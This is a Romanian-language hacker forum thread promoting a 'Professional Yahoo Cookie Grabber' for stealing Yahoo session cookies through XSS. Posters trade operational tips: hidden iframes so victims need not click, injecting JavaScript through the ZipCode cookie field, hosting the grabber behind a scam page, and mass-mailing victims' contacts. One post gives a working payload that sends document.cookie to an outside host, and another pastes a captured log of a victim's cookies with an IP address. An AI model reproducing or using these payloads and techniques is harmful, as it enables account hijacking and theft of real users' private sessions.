Jump to content
Guest Nemessis

[RST] Professional Yahoo Cookie Grabber [de actualitate]

Recommended Posts

pentru totzi cei care pun intrebari CITITZI CU ATENTZIE :

ACEST TOOL ESTE FACUT PENTRU CEI DEJA FAMILIARIZATI CU XSS SI ATACURI XSS IN SPECIAL DE YAHOO. ACEST TOOL NU ESTE UN TOOL DE GENUL CLICK SI AI COOKIEUL VICTIMEI CI ESTE DOAR UN TOOL CARE II VA FACE MUNCA USOARA ATACATORULUI PRIN DECODAREA DE COOKIE SI LINKURI UTILE.

CONCLUZIE : NU STITI CE INSEAMNA XSS SAU SA LANSATI ATACURI XSS ACEST TOOL NU VA ESTE UTIL.

Cred ca ar trebuii pus pe prima pagina asta,sa intelegi o data.Si acuma ma doare in cot daca va suparati pe mine,voi incercati sa furati cookie cuiva fara cunostinte,de programare,javascript,xss, nici macar minime,si dupa aia sa ii arati la unu ca iai furat cookie si ala sa faca plecaciuni in fata ta!!!!Acest om se numeste RATAT : CAUTATI PE GOOGLE DESPRE XSS,despre JavaScript.

V-am facut update la doua carti sub forma de pdf.

Syngress.Cross.Site.Scripting.Attacks.Xss.Exploits.and.Defense.May.2007

DOWNLOAD

http://rapidshare.com/files/81405173/Syngress.Cross.Site.Scripting.Attacks.Xss.Exploits.and.Defense.May.2007.pdf.html

XSS Attacks

DOWNLOAD

http://rapidshare.com/files/81405810/XSS_Attacks.pdf.html

Share this post


Link to post
Share on other sites
Deci e aceasi metoda, victima trebuie sa dea click pe link?

Daca gandeai mai mult de 5 sec,iti trecea prin cap sa pui prin iframe..

Dooh, daca taceai, filozof ramaneai.

Reformulez, noua versiune aduce ceva revolutionar, sau e doar o simpla cosmetizare a vechii metode?

Share this post


Link to post
Share on other sites

ar fi super daca ne-ati da si noua optiunea - prelungirea duratei de functionare a cookieurilor pentru a inlatura limita de 24 ore si mass mail in lista de contacte

Share this post


Link to post
Share on other sites
Guest Nemessis
ar fi super daca ne-ati da si noua optiunea - prelungirea duratei de functionare a cookieurilor pentru a inlatura limita de 24 ore si mass mail in lista de contacte

Sau ar fi super daca mi-as aduce aminte de cine are ban pe forum si si-a facut alt user. Termina cu prostiile.

Share this post


Link to post
Share on other sites
Deci e aceasi metoda, victima trebuie sa dea click pe link?

Daca gandeai mai mult de 5 sec,iti trecea prin cap sa pui prin iframe..

Din cauza functiei escape(document.cookie) sau poate a serverului ( imi dau si eu cu parerea nu zic ca e asa sigur ) grabberul cu toate ca primea cookieul nu il parsa asa ca l-am pus sa parseze $_SERVER["HTTP_REFERER"] si a fost totul ok . Poti sa imi explici si mie cu iframe-ul ala te rog ? Nu mai trebuie click ? devine un fel de csrf ?

Share this post


Link to post
Share on other sites
Poti sa imi explici si mie cu iframe-ul ala te rog ?

iframe e folosit pentru a incarca grabber-ul in fundal, in timp ce tu ii afisezi userului o alta pagina. Citeste mai multe despre asta aici.

Cookie este "transat" pentru a da doar valorile Y si T. Un atacator nu poate sa trimita in grabber niciun script pentru ca nu ar trece de "transarea" cookieului.

Nu chiar, se poate injecta foarte bine JS. La "Language" nu poate fi injectat JS pentru ca transforma toate caracterele in caractere mari, iar JS este case-sensitive.

2. chiar daca victima afla unde e grabberul trebe sa treaca de referer test ca sa poata injecta cookie malformat in el

Big deal :P. Folosesti CookieEditor, editez cookie-ul da lal Yahoo! punand JS in ZipCode, si apoi intri normal. Refer-ul va fi corect si injectarea codului va functiona.

incercatzi sa va folositzi mintea inainte de a face posturi ratate si tu si vladiii

dupa o zi de release si deja nu va mai sufar cu intrebarile si posturile idioate ... parerea mea e ca mai bine nu il lansam si gata

Ti se pare idiot sa vorbesc despre securitate pe un forum de securitate ?

Oricum, hai sa incercam sa trecem peste asta. Consider subiectul incheiat.

Share this post


Link to post
Share on other sites
Guest Nemessis

Multumim tw8. Intelege si tu ca BanKai are mai multe roluri pe RST. Unul ca developer si celalalt ca sa incinga spiritele. Isi indeplineste indatoririle foarte bine dupa cum vezi.

O sa se corecteze bug-urile in versiunea urmatoare. Nu ne-am dat interesul la posibilitatea de backfire pentru ca principalul scop a fost sa incepem upgradarea clasicelor grabbere.

Share this post


Link to post
Share on other sites
Guest BanKai

cu cateva minute inainte de prima plangere referitoare la xss in grabbed.html discutam cu kwe despre un vuln raportat de cineva cum ca ar fi un xss permanent in adminul de pe php bb si ne miram cum sa cauti si sa faci publi astfel de vuln ... cand el e useless ... daca esti admin la ce iti tre xss ... cam aceeasi duda este aici ... dar noah e un bug si btw scrie design by a2head ... stiti ce inseamna asta ? inseamna ca grabbed.html afisheaza ce a vrut a2head sa afiseze ...

Share this post


Link to post
Share on other sites
Poti sa imi explici si mie cu iframe-ul ala te rog ?
iframe e folosit pentru a incarca grabber-ul in fundal, in timp ce tu ii afisezi userului o alta pagina. Citeste mai multe despre asta aici.

Stiu ce e ala un iframe si cum se foloseste , eu (am vrut cel putin ) intreb cum dreacu incarci iframe-ul ala in yahoo si faci xss-ul sa fie executat in frame-ul ala.

Share this post


Link to post
Share on other sites
Guest BanKai

mai ce nu intelegeti ... aici nu discutam metoda xss ci doar grabberul ... sa raspund la intrebarea ta ... nu nu mai exista metoda automatizata de cookie stealing la yahoo ... ultima a fost descoperita de mine si de neme acum 3-4 luni si a stat la vip vreo 3 saptamani pana a fost patchuita din cauza lu mozi care a scapat'o pe mirc ...

Share this post


Link to post
Share on other sites

ma baeti mah,

eu n-am inteles ce vreti voi sa ziceti cu function init() ala ..cum adica nu mai merge?!

Deci eu folosesc graberul vechi cu javascriptu asta:

function init() { new Image().src='http://www.site.com/sdsphp?cookie='+escape(document.cookie); } window.onload=init; si grabberul lui kwerln

si merge struna... pe toate tipurile de browsere IE6, IE7 , Opera 9.2 , Firefox ultima versiune..inclusiv pe mail beta cat si pe versiunea veche de yahoo.

Acum am schimbat grabberul ... l`am pus pe cel nou si merge la fel de bine!

rezultatele sunt chiar spectaculoase!

In finalul acestui post tin sa mentionez urmatoarele:

multumiri lui Bankai, Nemessis, kw3rln, slick, si toti cei care au contribuit la automatizarea grabberului. Mi-ati dat idei ... acum lucrez si eu la o versiune a mea .. sper sa imi reuseasca ... ptr ca as dorii sa adaug si eu cateva chestii..

Mult noroc staff-ului RST si spor in toate proiectele voastre

....am plecat sa ard un Pall Mall ... ciao

Share this post


Link to post
Share on other sites

Bankai vreau sa te intreb o chestie ... aseara nu am inteles un lucru :| deci vreau sa pun pe un site graberu asta asa adika pe el sa fie scam care sa intre astia e si pe situ meu .. care il am sa fie grabberul.html sa vad de pe site la mine nu de pe hostu cu scam se poate daca da te rog ajutama

apropo scoate offlinu :D

Share this post


Link to post
Share on other sites
Guest BanKai

nu e offline e ignore si grabber.php trebuie sa fie pe acelasi host cu grabbed.html

Share this post


Link to post
Share on other sites

ah, am uitat ceva.

Acolo in index e setata functia X cu steinterval la 5 secunde si apoi urmeaza un if.....nu cumva if-ul ala trebuia sa vina inainte de setInterval?Cred ca asta ati vrut sa faceti.

Share this post


Link to post
Share on other sites

Dupa lupte seculare ... am reusit! Am combinat grabberu vechi a lu Slick shi ceva din asta nou, si merge! Si pe IE, si pe Opera si pe Mozilla! Ms baieti si scuze daca v-am enervat :) Trebuie sa fiti mai rabdatori cu incepatorii :)

EDIT

E naspa ca nu intotdeauna imi vine Y shi T .. imi vin cateodata alte chestii, inafara de Y si T :D

Pe mozilla vine Y shi T, pe IE6 nu vine Y si T ...

Exemplu


>> Received from 86.124.193.178 on 6.01.2008 at 8:04am <<
B=4dcr7j93kt37u&b=3&s=13; F=a=2WHkSp0MvT8Cy97c2AxBvNZ7rkozh2ecYAyfyfDtWZ5HcAGXFX.7CB2RSgxr6k.5Moe1yNE-&b=0iCd; PH=fn=g1KUIe.1is3esf6OLQ--&l=en-US; C=mg=1; CP=v=70008&br=i&pc=none; U=mt=C7zgg52MhYqRYLglmX20W0fFKEswKcgDe0Oy_A--&ux=4wegHB&un=e0af4q52iisll; LYC=l_v=0&l_lv=10&l_s=tq311xy0x2uyu1z3yw30st4543uzxw1u&l_um=0_0_1_0_0; D=_ylh=X3oDMTFmbW12azlmBF9TAzI3MTYxNDkEcGlkAzExOTk2OTkwMjQEdGVzdAN2MTAxBHRtcGwDdjEwMS1s

Share this post


Link to post
Share on other sites
Guest Nemessis
Stie careva totusi de ce nu vine shi Y cu T ? :)

Pentru ca ai combinat cele 2 grabbere :))))))) ESTI CULMEA!

Share this post


Link to post
Share on other sites

Pai ma .. din 2 grabbere ... am facut unu bun .. adica pe grabberu lu kw3 nu venea deloc de pe IE ... am luat grabberu asta a lu Slick si pe asta vine .. dar nu vine Y shi T :) Maree bataie de cap shi cu XSSu asta :) uof uof

Share this post


Link to post
Share on other sites
Guest Nemessis

Totusi uita-te putin la ce se scrie pe aici. Tu esti singurul care are probleme. Nu pricepi ca undeva gresesti? Ai folosit noul google_adsense.php? Fara referer?

Share this post


Link to post
Share on other sites

Nu :( Stiu ca eu gresesc pe undeva ... de aia va tot stresez, incercand sa-mi dau seama unde gresesc. De unde iau noul google_adsense.php ?

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...